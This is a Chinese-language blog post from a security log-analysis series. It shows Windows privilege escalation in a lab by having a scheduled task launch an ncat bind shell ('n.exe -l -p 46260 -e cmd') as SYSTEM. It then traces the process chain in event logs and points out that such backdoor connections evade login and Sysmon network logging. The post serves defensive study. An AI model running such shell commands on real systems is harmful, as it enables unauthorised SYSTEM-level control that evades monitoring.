iT邦幫忙

2024 iThome 鐵人賽

DAY 16
0
Security

資安日誌分析系列 第 16

16. Windows 提權(Schedule)

  • 分享至 

  • xImage
  •  

說明

建立一個長期可以連入的管道後,接著提升連入權限就可以做更多事情,譬如竊取密碼

作法

執行程式使用哪個帳號,就會帶有那個帳號的權限,以下我用pc01啟動就只有該帳號使用者權限,我們通常會想要拿到administrator 甚至更高的system權限

└─$ nc 192.168.22.101 46266
Microsoft Windows [Version 10.0.19041.450]
(c) 2020 Microsoft Corporation. All rights reserved.

C:\Users\pc01\Desktop\ncat-portable-5.59BETA1>whoami
whoami
pc01\pc01

上一章使用排程啟動nc,排程是使用system啟動,利用這個問題我們取的system的權限,下面分析一下EventLog

EventLog

svchost.exe (1280) > cmd.exe(2028)
svchost 使用System權限啟動 Schedule 排程啟動start.bat
https://ithelp.ithome.com.tw/upload/images/20240929/20077752qYvgUVIZVA.png

svchost.exe (1280) > cmd.exe(2028) > n.exe(5876)
start.bat 啟動n.exe

start /b /d "C:\Program Files\Windows\" n.exe -l -p 46260 -e cmd

https://ithelp.ithome.com.tw/upload/images/20240929/200777528tWNoJvXZ9.png

svchost.exe (1280) > cmd.exe(2028) > n.exe(5876) > cmd.exe(4680)
n.exe -e cmd 這個指令帶起讓遠端可以執行命令
https://ithelp.ithome.com.tw/upload/images/20240929/20077752NgNH1ex6c1.png

svchost.exe (1280) > cmd.exe(2028) > n.exe(5876) > cmd.exe(4680) > whoami.exe(4728)
遠端下whoami指令
https://ithelp.ithome.com.tw/upload/images/20240929/200777529VdDRf5zV6.png

補充說明,使用這個方式連入,是不會有EventID 4624的紀錄,也沒有Sysmon EventID 3 網路連線紀錄,如果只監控是否有非法登入會漏掉這些後門連線行為

REF

Checklist - Local Windows Privilege Escalation
https://book.hacktricks.xyz/windows-hardening/checklist-windows-privilege-escalation

Red Team Notes
https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/t1208-kerberoasting

audit_scripts
https://github.com/vanhauser-thc/audit_scripts/tree/master

Windows Local Privilege Escalation Cookbook
https://github.com/nickvourd/Windows-Local-Privilege-Escalation-Cookbook/tree/master


上一篇
15. Windows 持久化(Schedule)
下一篇
17. Windows 提權(Services)
系列文
資安日誌分析30
圖片
  直播研討會
圖片
{{ item.channelVendor }} {{ item.webinarstarted }} |
{{ formatDate(item.duration) }}
直播中

尚未有邦友留言

立即登入留言